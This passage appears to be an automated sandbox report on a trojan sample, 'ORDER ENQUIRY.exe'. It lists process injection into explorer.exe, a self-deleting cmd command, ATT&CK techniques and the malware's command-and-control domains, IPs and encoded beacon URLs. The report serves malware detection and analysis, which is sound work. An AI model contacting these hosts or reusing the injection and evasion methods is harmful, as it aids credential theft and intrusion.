          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84A80 mov eax, dword ptr fs:[00000030h]3_2_01B84A80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE8A90 mov edx, dword ptr fs:[00000030h]3_2_01AE8A90
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]3_2_01AEAAEE
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]3_2_01AEAAEE
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0AD0 mov eax, dword ptr fs:[00000030h]3_2_01AB0AD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AE4AD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AE4AD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADEA2E mov eax, dword ptr fs:[00000030h]3_2_01ADEA2E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AECA24 mov eax, dword ptr fs:[00000030h]3_2_01AECA24
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AECA38 mov eax, dword ptr fs:[00000030h]3_2_01AECA38
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]3_2_01AD4A35
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]3_2_01AD4A35
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3CA11 mov eax, dword ptr fs:[00000030h]3_2_01B3CA11
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]3_2_01B2CA72
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]3_2_01B2CA72
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]3_2_01AECA6F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]3_2_01AECA6F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_000E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000E1AC3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.221.68.229 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeNtQueueApcThread: Indirect: 0x196A4F2Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeNtClose: Indirect: 0x196A56C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMemory written: C:\Users\user\Desktop\ORDER ENQUIRY.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000Jump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"Jump to behavior
          Source: explorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.4553638640.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.4551732250.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2100259005.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.4550702238.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2099752489.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Users\user\Desktop\ORDER ENQUIRY.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_000E1975 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000E1975
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules
          1
          DLL Side-Loading
          612
          Process Injection
          1
          Masquerading
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism
          1
          Disable or Modify Tools
          LSASS Memory221
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          41
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
          Process Injection
          NTDS41
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism
          Cached Domain Credentials213
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523220 Sample: ORDER ENQUIRY.exe Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 31 www.raidsa.xyz 2->31 33 www.manhuafeifei.xyz 2->33 35 12 other IPs or domains 2->35 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 51 10 other signatures 2->51 11 ORDER ENQUIRY.exe 3 2->11         started        signatures3 49 Performs DNS queries to domains with low reputation 33->49 process4 file5 29 C:\Users\user\...\ORDER ENQUIRY.exe.log, ASCII 11->29 dropped 63 Injects a PE file into a foreign processes 11->63 15 ORDER ENQUIRY.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 2 other signatures 15->71 18 explorer.exe 102 7 15->18 injected process9 dnsIp10 37 flywatchsecurity.com 151.101.0.119, 49724, 80 FASTLYUS United States 18->37 39 www.mksport-app.com 154.221.68.229, 49720, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 18->39 41 4 other IPs or domains 18->41 53 System process connects to network (likely due to code injection or exploit) 18->53 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 61 Switches to a custom stack to bypass stack traces 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ORDER ENQUIRY.exe51%VirustotalBrowse
          ORDER ENQUIRY.exe58%ReversingLabsByteCode-MSIL.Trojan.SnakeLogger
          ORDER ENQUIRY.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.mksport-app.com1%VirustotalBrowse
          raidsa.xyz1%VirustotalBrowse
          www.os9user.com0%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse
          www.horxncnt.xyz0%VirustotalBrowse
          flywatchsecurity.com1%VirustotalBrowse
          www.flywatchsecurity.com0%VirustotalBrowse
          www.wergol.com0%VirustotalBrowse
          www.cttlca.click0%VirustotalBrowse
          www.raidsa.xyz0%VirustotalBrowse
          www.manhuafeifei.xyz0%VirustotalBrowse
          www.avai66.xyz0%VirustotalBrowse
          www.valo.games0%VirustotalBrowse
          www.21556934.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://powerpoint.office.comcember0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://outlook.com0%URL Reputationsafe
          http://www.flywatchsecurity.com0%VirustotalBrowse
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://www.bodgion.xyz/hy08/www.avai66.xyz1%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mksport-app.com
          154.221.68.229
          truetrueunknown
          raidsa.xyz
          3.33.130.190
          truetrueunknown
          www.os9user.com
          199.59.243.227
          truetrueunknown
          shops.myshopify.com
          23.227.38.74
          truetrueunknown
          www.horxncnt.xyz
          154.197.185.220
          truetrueunknown
          flywatchsecurity.com
          151.101.0.119
          truetrueunknown
          www.wergol.com
          unknown
          unknowntrueunknown
          www.flywatchsecurity.com
          unknown
          unknowntrueunknown
          www.cttlca.click
          unknown
          unknowntrueunknown
          www.valo.games
          unknown
          unknowntrueunknown
          www.manhuafeifei.xyz
          unknown
          unknowntrueunknown
          www.21556934.com
          unknown
          unknowntrueunknown
          www.raidsa.xyz
          unknown
          unknowntrueunknown
          www.avai66.xyz
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://www.horxncnt.xyz/hy08/?GxlX=J+fUwLE1cqwAibtDCdy9vP1S8G5oesFXJDqwJASvo9tHD3nGP7GVc6KavM+iw+vNh4vC&DVRXbd=tXIxBhEhlzJLRtrue
            unknown
            http://www.os9user.com/hy08/?GxlX=7jBziBoNeaZ0YBYCWuyuiMj/CYrZJe3GZSyGqEoVCgHfq7+BCveVTDnkVKPyAZoe4JtD&DVRXbd=tXIxBhEhlzJLRtrue
              unknown
              http://www.wergol.com/hy08/?GxlX=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cM7klw0Rkk8&DVRXbd=tXIxBhEhlzJLRtrue
                unknown
                http://www.raidsa.xyz/hy08/?GxlX=30efH6i7Pz0nBTvTyaS27TzcwE/B1ZxvPeuscSnkTZUQOLn/CwAUU0gdfCR3da34oWtV&DVRXbd=tXIxBhEhlzJLRtrue
                  unknown
                  http://www.mksport-app.com/hy08/?GxlX=NioFYaTFIvMJJp+7ScZBWsfgKUzei2ToAwpis545Pph8LP+guwZTQ54AM67XLgRQsCTP&DVRXbd=tXIxBhEhlzJLRtrue
                    unknown
                    http://www.flywatchsecurity.com/hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLRtrue
                      unknown
                      www.avai66.xyz/hy08/true
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.bodgion.xyz/hy08/www.avai66.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        http://www.flywatchsecurity.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://word.office.comonexplorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          http://www.manhuafeifei.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            http://www.hemcksqa.netReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              http://www.horxncnt.xyz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://www.cttlca.click/hy08/www.flywatchsecurity.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.flywatchsecurity.comReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.wergol.com/hy08/www.os9user.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.horxncnt.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.flywatchsecurity.com/hy08/www.21556934.comexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://powerpoint.office.comcemberexplorer.exe, 00000004.00000000.2117240871.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4560565201.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.raidsa.xyz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.yc23w.topReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.cttlca.click/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.manhuafeifei.xyz/hy08/www.horxncnt.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.btcrenaissance.net/hy08/www.yc23w.topexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.os9user.comReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://excel.office.comexplorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.btcrenaissance.netReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.microexplorer.exe, 00000004.00000002.4555698304.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555746089.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555114227.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.os9user.com/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.cheaplaptops.biz/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.raidsa.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.valo.games/hy08/explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.avai66.xyzexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://www.valo.gamesReferer:explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://www.google.comexplorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.btcrenaissance.netexplorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
